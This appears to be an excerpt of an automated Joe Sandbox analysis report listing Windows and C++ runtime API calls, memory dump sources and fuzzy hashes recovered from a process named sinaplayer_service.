                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3606007235-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,00ED4598,?,6C583036,00ED4598,00000000,?,00ED4C78), ref: 6C582FF8
                                                                                                                                                                                                    • _wcsdup.MSVCR120(00000000,00000000,?,00ED4598,?,6C583036,00ED4598,00000000,?,00ED4C78), ref: 6C583014
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crt_wcsdup
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1800982338-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0Info@File@base@@QAE@XZ.BASE(8285FFAB,00380B82), ref: 003808FA
                                                                                                                                                                                                    • ?GetFileInfo@base@@YA_NABVFilePath@1@PAUInfo@File@1@@Z.BASE(0038069E,?), ref: 0038090F
                                                                                                                                                                                                    • ?Explode@Time@base@@ABEX_NPAUExploded@12@@Z.BASE(00000001,?), ref: 00380931
                                                                                                                                                                                                    • ??1Info@File@base@@QAE@XZ.BASE ref: 0038099E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Info@$FileFile@base@@$Explode@Exploded@12@@File@1@@Info@base@@Path@1@Time@base@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3989346381-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 00386953
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 0038696D
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,?,?,?,?,?,?,?,?,?,?,?,0039AEA3,000000FF), ref: 003869C5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,?,?,?,?,?,?,?,?,0039AEA3,000000FF), ref: 003869D4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DictionaryValue@base@@$??2@??3@D@2@@std@@0@D@std@@String@U?$char_traits@V?$allocator@V?$basic_string@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1815709613-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?), ref: 00374A55
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,?), ref: 00374A68
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00374AB0
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00374AD8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@?gptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@Xbad_alloc@std@@memcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1600060970-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE(8285FFAB,00000000,?), ref: 00386521
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE ref: 00386536
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE ref: 00386551
                                                                                                                                                                                                    • ??1WeakPtrBase@internal@base@@QAE@XZ.BASE(00000000,00000000,?), ref: 00386594
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Weak$?is_valid@Reference@internal@base@@$Base@internal@base@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3336534564-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F3E1
                                                                                                                                                                                                      • Part of subcall function 0038EAA0: GetCurrentProcess.KERNEL32 ref: 0038EAAA
                                                                                                                                                                                                      • Part of subcall function 0038EAA0: DuplicateHandle.KERNEL32(00000000,?,?,?,00000002,00000000,00000000), ref: 0038EAC9
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,0FEB0000,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F41E
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,9F89F633,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F43C
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,000000B8,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F45A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DuplicateHandle$CurrentProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 322452111-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetOverlappedResult.KERNEL32(?,?,?,00000000,8285FFAB), ref: 0038F19C
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0038F1B5
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0038F1EF
                                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 0038F202
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeaveOverlappedResult
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2973586297-0
                                                                                                                                                                                                    • Opcode ID: 8ebb24afe00695799b7053f3c17c5018b32e782d73a8ad78c7cb5efac8d3d596
                                                                                                                                                                                                    • Instruction ID: df3c2ba691152c754ef5fda5899a5b2d6d9cbcd902a9ee3e5ee38f6b4e2f8731
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ebb24afe00695799b7053f3c17c5018b32e782d73a8ad78c7cb5efac8d3d596
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E821AC71A00B04DFDB22DF64DC49B9AB7F9FF04304F10466AE812D36A0DB76A944CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(8285FFAB,?,?,?,?,0039AF1E,000000FF), ref: 00386C03
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(8285FFAB,?,?,?,?,0039AF1E,000000FF), ref: 00386C25
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,?,?,?,0039AF1E,000000FF), ref: 00386C3B
                                                                                                                                                                                                    • ?Destruct@TaskRunnerTraits@base@@SAXPBVTaskRunner@2@@Z.BASE(00000000,?,?,?,?,0039AF1E,000000FF), ref: 00386C51
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedCompareExchange.KERNEL32(003AC118,00000001,00000000), ref: 00375EFB
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000134,?,?,?,003993DB,000000FF), ref: 00375F0A
                                                                                                                                                                                                    • ?RegisterCallback@AtExitManager@base@@SAXP6AXPAX@Z0@Z.BASE(00375EA0,00000000), ref: 00375F45
                                                                                                                                                                                                    • ?WaitForInstance@internal@base@@YAHPAH@Z.BASE(003AC118,?,?,?,003993DB,000000FF), ref: 00375F65
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00390CF2
                                                                                                                                                                                                    • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,8285FFAB), ref: 00390D10
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00390D3A
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 00390D54
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6C5CA830
                                                                                                                                                                                                      • Part of subcall function 6C5B8D76: _SpinWait.LIBCMT(?,?,6C5BF2B2,00000000), ref: 6C5B8D8E
                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 6C5CA84D
                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::GetInternalContext.LIBCMT ref: 6C5CA859
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCMT ref: 6C5CA874
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0038EAAA
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00000002,00000000,00000000), ref: 0038EAC9
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00100002,00000000,00000000), ref: 0038EAF2
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00100000,00000000,00000000), ref: 0038EB13
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 0037EA12
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,00000000), ref: 0037EA2E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037EA3F
                                                                                                                                                                                                    • ??1SimpleThread@base@@UAE@XZ.BASE ref: 0037EA62
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037EAFE
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037EB22
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037EB5C
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: GetCurrentThreadId.KERNEL32 ref: 0037EB96
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: GetTickCount.KERNEL32 ref: 0037EBB3
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EBD0
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037EBF3
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EC04
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037EC1E
                                                                                                                                                                                                      • Part of subcall function 0037EAB0: OutputDebugStringA.KERNEL32(00000000,?), ref: 0037EC42
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$??3@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@CountCurrentD@std@@@1@@DebugFileOutputPath@base@@SimpleStringThreadThread@base@@TickV01@@V?$basic_streambuf@
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenProcess.KERNEL32(10000000,00000000,?), ref: 0038E393
                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 0038E3B8
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0038E3D0
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0038E3E5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEventProcess$OpenTimes
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C57CFFF
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000004,6C57D125,00000000,?,00000001,?), ref: 6C57D02E
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000001,00000004,6C57D125,00000000,?,00000001,?), ref: 6C5A3978
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,00000003,00000004,6C57D125,00000000,?,00000001,?,?,00000001), ref: 6C5A399F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003748B7
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 003748D4
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,?,8285FFAB,?), ref: 003748E5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,?), ref: 003748F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$ExceptionThrowmemcpy
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0038E550: UnregisterWaitEx.KERNEL32(?,000000FF,00000063,0038E8E3,00000001), ref: 0038E55D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0038EBD2
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0038EBDF
                                                                                                                                                                                                      • Part of subcall function 0038F650: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,0038EBF7,?), ref: 0038F691
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0038EBF8
                                                                                                                                                                                                      • Part of subcall function 0038E570: UnregisterWaitEx.KERNEL32(?,000000FF,00000063,?,0038E8DC,00000001), ref: 0038E586
                                                                                                                                                                                                      • Part of subcall function 0038E270: UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E284
                                                                                                                                                                                                      • Part of subcall function 0038E270: UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E297
                                                                                                                                                                                                      • Part of subcall function 0038E270: CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2AE
                                                                                                                                                                                                      • Part of subcall function 0038E270: CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2B8
                                                                                                                                                                                                      • Part of subcall function 0038E270: CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C2
                                                                                                                                                                                                      • Part of subcall function 0038E270: ??_V@YAXPAX@Z.MSVCR120(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,?,?), ref: 0038EC13
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: UnregisterWait$CloseCriticalHandleSection$??3@Leave$Enter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 616177342-0
                                                                                                                                                                                                    • Opcode ID: 79858601a8874eb94fdbf1bced61ed0274b2f675518ffbd2e41e5c5de505436d
                                                                                                                                                                                                    • Instruction ID: 7d71bec66498c3539d4da086a2c2d5eb8258c2cc4b13741a67a3109763ad7b35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79858601a8874eb94fdbf1bced61ed0274b2f675518ffbd2e41e5c5de505436d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF02832200700A7C7137755EC45EBF7BAD8FC2320F04047AFA0686250EB25E946D3E5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorEventFileLastReadmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1263425661-0
                                                                                                                                                                                                    • Opcode ID: 614f7335f957adb6b5d282dcabe46898ef5907594ae165f271901c46b6da3d3b
                                                                                                                                                                                                    • Instruction ID: 6cf69295e9b8410f70b0ab7a303fa7897825d722b5383761f8cf00de530de6e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 614f7335f957adb6b5d282dcabe46898ef5907594ae165f271901c46b6da3d3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201A271600605BBE7129B75EC0EB9ABBACFB45314F100156F908C2590DBB1A92697E1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6C57EA10,0000000C,6C57EA44,Function_0001D315,?,?,00000000,?), ref: 6C57E9CC
                                                                                                                                                                                                      • Part of subcall function 6C564B96: _lock.MSVCR120(?), ref: 6C564BC1
                                                                                                                                                                                                      • Part of subcall function 6C570477: _fileno.MSVCR120(?,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C57047F
                                                                                                                                                                                                      • Part of subcall function 6C570477: _isatty.MSVCR120(00000000,?,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C570485
                                                                                                                                                                                                      • Part of subcall function 6C570477: __p__iob.MSVCR120(0000FFFF,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C570491
                                                                                                                                                                                                      • Part of subcall function 6C570477: __p__iob.MSVCR120(0000FFFF,?,?,6C5707F9,-00000020,6C570850,00000010), ref: 6C5704A1
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C57E9F2
                                                                                                                                                                                                      • Part of subcall function 6C57E98E: _unlock_file.MSVCR120(?,6C57EA06), ref: 6C57E98F
                                                                                                                                                                                                    • _errno.MSVCR120(6C57EA10,0000000C,6C57EA44,Function_0001D315,?,?,00000000,?), ref: 6C5A5CBA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C57EA10,0000000C,6C57EA44,Function_0001D315,?,?,00000000,?), ref: 6C5A5CC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_errno_fileno_invalid_parameter_noinfo_isatty_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 169382274-0
                                                                                                                                                                                                    • Opcode ID: 7d1168d8fb668f89ae1565e2654f72598cc696891d6341ce7728b4015807ae7f
                                                                                                                                                                                                    • Instruction ID: deab5fd5ff2d825e61b4a63df19d1ed6133f04a0fe9e9e6e22f1bdc78953d2a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d1168d8fb668f89ae1565e2654f72598cc696891d6341ce7728b4015807ae7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92014F71901245FFDB119FB18C04BEF36A1BF81368F504529E8209AB90DB78C9569BA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037124E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 0037126B
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,?,8285FFAB,?), ref: 00371279
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,?), ref: 00371289
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
